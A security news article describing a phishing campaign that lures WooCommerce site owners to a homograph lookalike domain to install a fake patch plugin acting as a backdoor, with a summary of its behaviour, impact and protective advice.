WooCommerce Users Targeted by Sophisticated Phishing Attack

Cybersecurity experts have issued a warning about a large-scale phishing attack targeting WooCommerce users. The attackers are tricking victims with a fake security alert, prompting them to download a “critical patch” that instead installs a backdoor on their websites.

This campaign, described as sophisticated by Patchstack, a WordPress security company, mirrors a similar attack observed in December 2023. In that earlier campaign, attackers used a fake CVE to breach WooCommerce sites. The phishing techniques, malicious web pages, and methods to hide malware are almost identical, suggesting this might be the work of the same threat actor or a new cluster of cybercriminals copying their tactics.

Security researcher Chazz Wolcott explained that the attackers claim the targeted websites have been affected by a non-existent “Unauthenticated Administrative Access” vulnerability. They then lure victims to a fake WooCommerce website using an IDN homograph attack, which uses characters like “ė” to mimic the official WooCommerce site.

How the Attack Works: A Step-by-Step Breakdown

Once a victim receives the phishing email, they are prompted to click a “Download Patch” link. This action takes them to a fraudulent WooCommerce Marketplace page hosted on woocommėrce[.]com. Here, they are encouraged to download a ZIP archive named authbypass-update-31297-id.zip.

Upon installation, the malicious plugin carries out the following harmful actions:

1. Creates a new admin-level user with an obfuscated username and randomized password.
2. Sets up a cron job that runs every minute.
3. Sends HTTP GET requests to external servers, transmitting information such as the username, password, and the infected website’s URL.
4. Downloads a next-stage payload from a second server like woocommerce-help[.]com or woocommerce-api[.]com.
5. Decodes the payload to extract malicious web shells like P.A.S.-Fork, p0wny, and WSO.
6. Hides the malicious plugin and the newly created admin account from the WordPress dashboard.

The Impact of the Attack

Once the attackers gain control of the website, they can carry out a range of malicious activities, including:

• Injecting spam or fraudulent ads onto the website.
• Redirecting visitors to fake or malicious websites.
• Enrolling the compromised server into a botnet to execute DDoS attacks.
• Encrypting server resources as part of an extortion attempt.

How to Protect Your Site from This Phishing Campaign

To protect against this attack, users are advised to:

• Scan your website for suspicious plugins or newly created admin accounts.
• Ensure your software is up-to-date to close any potential security gaps.
• Be cautious of any unexpected emails requesting you to download or install patches, especially those with links that seem suspicious or are not from official sources.

This phishing campaign serves as a stark reminder of the need for heightened vigilance and proactive security measures to protect WooCommerce and WordPress sites from growing cyber threats.